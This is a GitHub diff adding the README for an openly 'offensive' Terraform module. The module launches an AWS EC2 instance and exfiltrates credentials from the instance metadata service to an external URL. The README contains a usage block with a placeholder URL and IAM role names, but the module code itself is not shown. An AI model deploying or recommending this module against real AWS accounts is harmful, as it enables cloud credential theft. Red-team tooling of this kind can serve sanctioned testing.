File tree Expand file tree Collapse file tree 1 file changed +23
-0
lines changed Expand file tree Collapse file tree 1 file changed +23
-0
lines changed Original file line number Diff line number Diff line change 1+ # AWS EC2 Instance Credential Exfiltration Module
2+
3+ ![ OffensiveTerraform] ( https://img.shields.io/badge/offensive-terraform-purple )
4+
5+ Offensive Terraform module which creates EC2 instance and exfilrate credential from Instance metadata to external URL.
6+
7+ ![ Attack Diagram] ( https://github.com/offensive-terraform/terraform-aws-ec2-instance-credential-exfiltration/blob/master/diagram.jpg )
8+
9+ ## Usage
10+ ```
11+ module "ec2_instance_credential_exfiltration" {
12+ source = "offensive-terraform/terraform-aws-ec2-instance-credential-exfiltration"
13+
14+ subnet_id = "subnet-0a4a1cc04"
15+ url = "http://0.0.0.0/
16+ iam_role= "ec2-instance-role"
17+ iam_instance_profile = "ec2-instance-profile"
18+ }
19+ ```
20+ ## Author
21+ Module managed by https://github.com/offensive-terraform/
22+
23+
You can’t perform that action at this time.
0 commit comments